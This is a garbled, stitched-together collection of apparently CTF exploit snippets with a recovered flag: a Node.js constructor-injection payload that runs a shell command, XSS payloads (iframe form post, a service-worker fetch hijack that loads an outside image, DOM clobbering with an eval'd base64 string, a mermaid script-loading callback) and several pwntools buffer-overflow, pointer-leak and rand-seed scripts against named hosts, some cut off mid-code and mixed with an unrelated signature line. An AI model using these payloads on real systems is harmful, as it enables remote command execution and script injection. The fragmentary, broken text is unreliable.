'+constructor.constructor("return process")().mainModule.require("child_process").execSync('cat * | grep CSR')+'
CSR{r363x_15_fun_r363x_15_l0v3}
'+constructor.constructor("return process")().mainModule.require("child_process").execSync('cat * | grep CSR')+'
CSR{r363x_15_fun_r363x_15_l0v3}
<iframe srcdoc="<form action="https://amazingnotes.asisctf.com:444/" method="POST" id=x> | |
<input name=ext value=es> | |
<textarea name=note> | |
self.addEventListener("fetch", function(event) { | |
if(event.request.url.indexOf("flag") != -1) | |
return; | |
event.respondWith(new Response(` | |
<img src=//p6.is/givemeflag> | |
<script> |
<a id=context><iframe id=context name=apiPublicKey href="x"></iframe><iframe id=context name=auth href="x" b=y></iframe><iframe id=context name=disqusUrl href="x"></iframe></a> | |
<div id="account-nav"></div><div id="anon-account-nav-tmpl">${eval(atob(`YWxlcnQob3JpZ2luKQ`))}</div> | |
* repeat below if you want to improve the reliability | |
```mermaid | |
graph LR; | |
A-->B; | |
click B callback "<script src=https://a.disquscdn.com/1608164631/build/js/abadd50d331d.js></script><script src=https://a.disquscdn.com/1608164631/js/src/global.js></script>" | |
``` |
from pwn import * | |
# Local-process variant of the connection, left disabled in favour of the
# remote service below.
# p = process('./game') | |
# Open a TCP connection to the challenge service.
p = remote('cop.ichsa.ctf.today', 8011) | |
# Answer the menu prompt with option '2'; the loop header runs 0x90 (144) times.
# NOTE(review): indentation was lost in this listing, so whether one or both of
# the following calls belong to the loop body cannot be determined from here.
for i in range(0x90): | |
p.sendlineafter('Please chose an option', '2') | |
p.sendlineafter('Please chose an option', '2') | |
# Six filler bytes followed by sixteen copies of the 64-bit value 0x401813.
# The listing ends before the payload is sent.
# NOTE(review): 0x401813 looks like a code address in a non-PIE image, and the
# repetition suggests the exact overwrite offset is not pinned down; confirm
# against the binary. If so, a bounded read, a stack protector and a PIE build
# are the relevant hardening points.
payload = b'aaaaaa' + p64(0x401813)*16 |
from pwn import * | |
# Open a TCP connection to the challenge service.
p = remote(
    '20.42.99.115',
    3000,
)

# One line made of 150 bytes of value 0x01.
# NOTE(review): presumably longer than the buffer the service reads into;
# confirm against the binary. The fix on the service side is a length-bounded
# read, not a larger buffer.
payload = 150 * b'\1'
p.sendline(payload)

# Hand the connection over to the terminal for manual interaction.
p.interactive()
from pwn import * | |
# Log every byte sent and received while the script runs.
context.log_level = 'debug'

# Local variant (kept disabled): run the AArch64 binary under qemu-user with a
# gdb stub listening on port 1234.
# p = process('./qemu-aarch64 -L . -g 1234 ./vuln'.split(' '))
p = remote(
    'pwn.zh3r0.cf',
    1111,
)

# Parse the local copy of the target binary.
e = ELF('./vuln')

# Send exactly eight 'a' characters with no trailing newline, then consume the
# response up to and including the same eight characters.
# NOTE(review): presumably the service echoes its input buffer and whatever
# follows the echo is adjacent memory; confirm. A service that prints a buffer
# it has not NUL-terminated discloses those neighbouring bytes.
p.send(8 * 'a')
p.recvuntil(8 * 'a')
I hereby claim:
To claim this, I am signing this object:
from pwn import * | |
from ctypes import * | |
from time import sleep | |
# Log every byte sent and received while the script runs.
context.log_level = 'debug'

# Load the libc shipped next to the script and seed its rand() state with the
# current time as returned by that libc's time().
# NOTE(review): presumably this mirrors an srand(time(0)) call in the target;
# confirm. A generator seeded with the wall-clock second is reproducible by any
# peer whose clock agrees to the second, so values that must be unpredictable
# need an OS CSPRNG (getrandom(), /dev/urandom) instead of rand().
rlibc = CDLL('./libc.so')
seed = rlibc.time(0)
rlibc.srand(seed)

# Local-process variant of the connection, left disabled.
# p = process('./chall')
from pwn import * | |
# Local-process variant of the connection, left disabled in favour of the
# remote service below.
# p = process('./ap-abcs')
p = remote(
    'bin.bcactf.com',
    49154,
)

# 0x50 - 0x4 = 0x4c zero bytes, then the 32-bit value 0x73434241, which packs
# little-endian (the pwntools default) as the bytes b'ABCs'.
# NOTE(review): presumably the padding fills a stack buffer and the final four
# bytes land on an adjacent variable the program compares; confirm against the
# binary. A read bounded to the buffer size closes this.
payload = b'\0' * (0x50 - 0x4) + p32(0x73434241)
p.sendline(payload)
from pwn import * | |
# Local-process variant of the connection, left disabled in favour of the
# remote service below.
# p = process('./chall')
p = remote(
    '35.224.135.84',
    1001,
)

# Choose menu option '1' at the '>' prompt.
p.sendlineafter('>', '1')

# The reply line carries a hexadecimal number from byte offset 40 up to three
# bytes before its end; parse it as an integer.
leak_line = p.recvline()
pie_leak = int(leak_line[40:-3], 16)

# NOTE(review): presumably the printed value is a code pointer at offset 0x1390
# in the binary, making this the PIE load base; confirm. A service that prints
# a code address gives away its ASLR slide, so diagnostic output should not
# include raw pointers.
pie_base = pie_leak - 0x1390
print(hex(pie_leak))